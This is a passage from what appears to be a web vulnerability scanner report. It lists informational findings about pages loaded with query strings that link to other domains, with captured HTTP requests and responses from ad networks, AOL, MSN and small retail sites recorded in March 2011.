GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121459&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fcoastwise&dt=1301103509195&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103509294&frm=0&adk=3965760877&ga_vid=882225221.1301103509&ga_sid=1301103509&ga_hid=981111953&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=995&ref=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F%2BNSFTW%2B%3Fordering%3D%26searchphrase%3Dall&fu=0&ifi=1&dtd=1341&xpc=d0aNJSztDL&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 01:37:42 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 3947
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.soundingsonline.com/news/coastwise%26hl%3Den%26client%3Dca-pub-5812731941170583%26adU%3Dwww.WindstarCruises.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGmM19xwNdh_Q3a3P93jqKNICfYlQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.70. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shavlik/index.cfm?pg=374 HTTP/1.1
Host: learn.shavlik.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:58:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                   
...[SNIP]...
<body>
<img src="http://www.burstnet.com/enlightn/7214//98DD/" width="0" height="0" border="0"><!--- Remarketing Tracking pixel --->
...[SNIP]...
20.71. http://my-happyfeet.com/cart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:46:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 39610
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no">
<link rel="start" href="http://www.myhappyfeetcolors.com/" title="Home">
<meta name="GENERATOR" content="ATG Programming Department">
...[SNIP]...
</font>
           <a target="_blank" style="text-decoration: underline" href="http://www.atgincorporated.com/">
           <font color="#FFFFFF">
...[SNIP]...
</table>
   <a href="http://www.instantssl.com" id="comodoTL">SSL</a>
...[SNIP]...
20.72. http://my-happyfeet.com/proddetail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /proddetail.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /proddetail.asp?prod=0001 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:46:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 41348
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no">
<link rel="start" href="http://www.myhappyfeetcolors.com/" title="Home">
<meta name="GENERATOR" content="ATG Programming Department">
...[SNIP]...
<span style="background-color: #AC1F1A; float:right;margin-right:5;margin-top:3"><img src="http://img.constantcontact.com/ui/images1/visitor/email5_trans.gif" alt="Email Newsletter icon, E-mail Newsletter icon, Email List icon, E-mail List icon" border="0"></span>
...[SNIP]...
<p style="margin-top: 0; margin-bottom: 0" align="center">
                                               <a target="_blank" href="http://www.facebook.com/MyHappyFeet?v=wall">
                                               <img border="0" src="images/social_05.jpg" width="147" height="37">
...[SNIP]...
</font>
           <a target="_blank" style="text-decoration: underline" href="http://www.atgincorporated.com/">
           <font color="#FFFFFF">
...[SNIP]...
20.73. http://o.aolcdn.com/art/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/merge

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /art/merge?f=/_media/music_blogs/blogutil.js&f=/_media/music_blogs/crosspromo.js&f=/aolvideo/acv_vidgallery1.2.js&expsec=86400&ver=46 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 129501
Cache-Control: max-age=86400
Expires: Sun, 27 Mar 2011 20:36:19 GMT
Date: Sat, 26 Mar 2011 20:36:19 GMT
Connection: close

/* __________________________ JSON script object */
/*constructor function for creating a new scriptJSON object*/
var scriptJSON = function (fullUrl) {
   this.fullUrl = fullUrl;
   this.scriptId = 'scr
...[SNIP]...
<div class="sponFtr" style="float:right;width:100px;"><a href="http://aol.adsonar.com/admin/advertisers/indexPl.jsp" target="_blank">Buy a link here</a>
...[SNIP]...
</span><a style="color:#0B5589" href="http://video.aol.com" target="new">AOL Video</a>
...[SNIP]...
<param name='allowFullScreen' value='true'><embed src='http://www.howcast.com/flash/aol_player.swf?id={"+vidgal.moduledata[whichone].pid+"&autoplay=" + vidgal.autoplay + "' type='application/x-shockwave-flash' width='"+vwidth+"' height='"+vheight+"' allowScriptAccess='always' allowFullScreen='true' wmode='window'></embed></object>";
       
       },


   embedCBSplayer:function(whichone) {
       vwidth = vidgal.moduledata[whichone].width;
       vheight = Math.round(vwidth / 1.0725);
       
       vidgal.theHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="'+vwidth+'" height="'+vheight+'" id="rcpHolder"><param name="allowScriptAccess" value="always">
...[SNIP]...
images/testPartnerLogo.gif&releaseURL=http://release.theplatform.com/content.select?pid='+vidgal.moduledata[whichone].pid+'&Tracking=true&Embedded=True&partner=aol&autoPlayVid=' + vidgal.autoplay + '"><embed src="http://www.cbs.com/thunder/swf/rcpHolderCbs-AOL2-PROD.swf" quality="high" bgcolor="#ffffff" width="'+vwidth+'" height="'+vheight+'" name="rcpHolder" scale="scale" salign="tl" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" type="application/x-shockwave-flash" FlashVars="link=http://www.cbs.com&partnerLogo=images/testPartnerLogo.gif&releaseURL=http://release.theplatform.com/content.select?pid='+vidgal.moduledata[whichone].pid+'&Tracking=true&Embedded=True&partner=aol&autoPlayVid=' + vidgal.autoplay + '" pluginspage="http://www.macromedia.com/go/getflashplayer"></object>
...[SNIP]...
<param name="allowFullScreen" value="true"/><embed width="'+vidgal.vwidth+'" height="'+vidgal.vheight+'" allowfullscreen="true" wmode="window" allowscriptaccess="always" type="application/x-shockwave-flash" src="http://player.hulu.com/embed/aol_player.swf?pid=' + vidgal.moduledata[whichone].pid + '&embed=true"/></object>';
           } else {
           // IE6, older browsers
           vidgal.theHTML += '<embed width="'+vidgal.vwidth+'" height="'+vidgal.vheight+'" allowfullscreen="true" wmode="window" allowscriptaccess="always" type="application/x-shockwave-flash" src="http://player.hulu.com/embed/aol_player.swf?pid=' + vidgal.moduledata[whichone].pid + '&embed=true"/></object>
...[SNIP]...
mbedMTVplayer:function(whichone) {
       vwidth = vidgal.moduledata[whichone].width;
       vheight = Math.round(vwidth / 1.0725);
       axs.log("mtvpid = " + vidgal.moduledata[whichone].pid);
    vidgal.theHTML += '<embed src=http://media.mtvnservices.com/' + vidgal.moduledata[whichone].pid + ' width="'+vwidth+'" height="'+vheight+'" wmode="window" allowFullscreen="true" flashVars="orig=aol&amp;autoPlay=' + vidgal.autoplay + '" allowScriptAccess="always" type="application/x-shockwave-flash"/>';
   },


   embedNNNplayer:function(whichone) {
       vwidth = vidgal.moduledata[whichone].width;
       vheight = Math.round(vwidth / 1.0725);
       axs.log("pid = " + vidgal.moduledata[whichone].pid);

       vidgal.theHTML += '<embed src="http://aolvideo.nextnewnetworks.com/embed/player" width="' + vwidth + '" height="' + vheight + '" allowScriptAccess="always" allowFullScreen="true" FlashVars="video_file=http://aolvideo.nextnewnetworks.com/play/' + vidgal.moduledata[whichone].pid + '&autostart=' + vidgal.autoplay +'" wmode="transparent" type="application/x-shockwave-flash"></embed>
...[SNIP]...
ion(whichObj) {
       whichone = whichObj;
       vwidth = vidgal.moduledata[whichone].width;
       vheight = Math.round(vwidth / 1.0725);
       axs.log("pid = " + vidgal.moduledata[whichone].pid);
   vidgal.theHTML += '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="'+vwidth+'" height="'+vheight+'" id="AOLmpf" align="middle"><param name="allowScriptAccess" value="always">
...[SNIP]...
<param name="bgcolor" value="#d4d0c8"><embed src="http://sports.espn.go.com/broadband/aol/player.swf?vid='+vidgal.moduledata[whichone].pid+'&nextplay=external&nexturl=http://video.aol.com/partner/espn/title/NEXT_PID&autoplay=' + vidgal.autoplay + '&thumbnail=" quality="high" bgcolor="#d4d0c8" width="'+vwidth+'" height="'+vheight+'" name="AOLmpf" align="middle" allowScriptAccess="always" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></object>
...[SNIP]...
<div id="playerContainer"><a href="http://www.nationalgeographic.com/download/flash">You need the latest Flash Player plugin to view the multimedia content of this site.</a>
...[SNIP]...
<div id="flash_container" style="padding:0px !important;margin:0px !important;;position:relative;width:'+vwidth+'px;height:'+vheight+'px"><object id="player2092" codeBase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" height="'+vheight+'" width="'+vwidth+'" padding="0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" VIEWASTEXT><param name="FlashVars" value="'+imageoverride+'&assetId='+vgassetid+'&playerId=player2092&serverBase=http://videoapi.aol.com&rvChannelFilter=AOLNull&autoplay='+vidgal.autoplay+'&displaySearch=false&di
...[SNIP]...
<p style="font:10pt Verdana;color:#f18512">To view this site, you need to have Flash Player 9.0 or later installed. Click <a href="http://www.macromedia.com/go/getflashplayer/" target="_blank" style="color:#f18512">here</a>
...[SNIP]...
<p style="font:10pt Verdana;color:#f18512">To view this site, you need to have Flash Player 9.0 or later installed. Click <a href="http://www.macromedia.com/go/getflashplayer/" target="_blank" style="color:#f18512">here</a>
...[SNIP]...
<p style="font:10pt Verdana;color:#f18512">To view this site, you need to have Flash Player 9.0 or later installed. Click <a href="http://www.macromedia.com/go/getflashplayer/" target="_blank" style="color:#f18512">here</a>
...[SNIP]...
);
   so.addVariable("releaseURL", "http://release.theplatform.com/content.select?pid="+vidgal.moduledata[whichone].pid+"&UserName=AOL&format=SMIL&Tracking=true");
   so.addVariable("embeddedPlayerHTML", '<iframe src="http://player.theplatform.com/ps/player/pds/jeYWF4kqb-?pid={releasePID}&embedded=true&width=400&height=373" width="400" height="373" frameborder="0"></iframe>
...[SNIP]...
20.74. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1300632449.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.2120303763.1300632449.1300817215.1301068080.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Mar 2011 11:56:49 GMT
Cache-Control: private,max-age=300
Date: Sat, 26 Mar 2011 11:51:49 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 117386

<html><head><style type="text/css">body,td,div,span,p{font-family:arial,sans-serif;}a {color:#0000cc;}a:visited {color:#551a8b;}a:active {color:#ff0000;}body{margin: 0px;padding: 0px;background-color:
...[SNIP]...
<div id="paging_controls" style="overflow: hidden; padding: 2px 0px 4px 6px;">
<a href="http://fcgadgets.blogspot.com/" target="_blank">Get more gadgets for your site</a>
...[SNIP]...
20.75. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 21:08:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMpL19oLiEiHh4cIx84MDAwLS0=; Expires=Thu, 13-Apr-2079 00:22:27 GMT; Path=/
ETag: 5f516b3df0af9786bc8afb1e77028d17
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36385


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/99/none/month-star.png" alt="$ 0.99"></span>
...[SNIP]...
<span class="container"><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/9/99/none/month.png" alt="$ 9.99"></span>
...[SNIP]...
rel="scrollbars=no,width=557,height=442" href="/xml/deref?link=https%3A%2F%2Fwww.scanalert.com%2FRatingVerify%3Fref%3Dwww.1and1.com&amp;__sign=825f1463bac30a87f1b29f520f32edff&amp;__ts=1301087300279"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" class="mcafee" src="//images.scanalert.com/meter/www.1and1.com/22.gif" width="115"></a>
...[SNIP]...
20.76. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TO&AP=1390 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 852
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8255285-T20670740-C67000000000038396
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:42:30 GMT
Content-Length: 852


//<![CDATA[
function getRADIds() { return{"adid":"67000000000038396","pid":"8255285","targetid":"20670740"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003X/67000000000038396.1??PID=8255285&amp;UIT=G&amp;TargetID=20670740&amp;AN=1797980921&amp;PG=CMS3TO&amp;ASID=dd6e9fa54e5647bba6a315956c3405ee" target="_blank"><img src="http://ads2.msads.net/CIS/77/000/000/000/013/208.jpg" width="728" height="90" alt="Advertisement - Shavlik" border="0" /></a>
...[SNIP]...
20.77. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TE&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 855
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8255284-T20670730-C98000000000038650
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:41:08 GMT
Content-Length: 855


//<![CDATA[
function getRADIds() { return{"adid":"98000000000038650","pid":"8255284","targetid":"20670730"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
<a href="http://g.msn.com/2AD0003X/98000000000038650.1??PID=8255284&amp;UIT=G&amp;TargetID=20670730&amp;AN=151651065&amp;PG=CMS3TE&amp;ASID=fff6a9c87eaa4a11820e932655d4bb25" target="_blank"><img src="http://ads2.msads.net/CIS/117/000/000/000/012/941.jpg" width="300" height="250" alt="Advertisement - Shavlik" border="0" /></a>
...[SNIP]...
20.78. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TE&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 853
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8255284-T20670730-C7000000000038968
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:42:31 GMT
Content-Length: 853


//<![CDATA[
function getRADIds() { return{"adid":"7000000000038968","pid":"8255284","targetid":"20670730"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003X/7000000000038968.1??PID=8255284&amp;UIT=G&amp;TargetID=20670730&amp;AN=1914896742&amp;PG=CMS3TE&amp;ASID=bed6faf786dd48eb9d5279f98f46ba68" target="_blank"><img src="http://ads2.msads.net/CIS/30/000/000/000/013/038.jpg" width="300" height="250" alt="Advertisement - Shavlik" border="0" /></a>
...[SNIP]...
20.79. http://s.huffpost.com/assets/js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.huffpost.com
Path:   /assets/js.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

